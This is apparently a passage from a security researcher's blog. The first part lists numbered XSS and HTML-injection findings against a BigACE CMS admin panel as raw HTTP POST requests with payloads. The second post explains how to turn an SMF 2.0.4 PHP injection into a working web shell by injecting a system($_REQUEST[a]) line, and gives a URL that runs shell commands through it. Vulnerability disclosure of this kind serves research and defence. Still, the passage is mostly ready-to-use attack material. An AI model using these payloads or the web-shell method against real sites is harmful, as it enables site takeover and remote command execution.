Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---


26. adding new community

when you're adding new community you can write
directly to file consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]


In this case, I changed 'aaaa' string to html code to check if page
will show it (as html, not as txt). HTML injection is possible here.

27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---


29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---


31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

Cheers o/

Thursday 1 August 2013

[EN] SMF 2.0.4 PHP Injection - part 2

Durning last few weeks a lot of you asked me about how to add shell via this PHP injection
vulnerability.

I decide to publish another poc-code to show you how it can be done (but I believe
that few of you can code better php-ideas than me ;) )

Anyway, as it was described here and here, try to add - as this 'poc-php-code' - line
like this one:

---< code >---
 en_US\';system($_REQUEST[a]);//
---< code >---

Next step to do is go directly to your (changed) file and add an 'a' parameter with
value equal to Bash command :)

Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27

Now it will be possible to create a working web-shell.

Let me know via email or comments again if you have other ideas how this attack can be extended. ;)

Cheers!

o/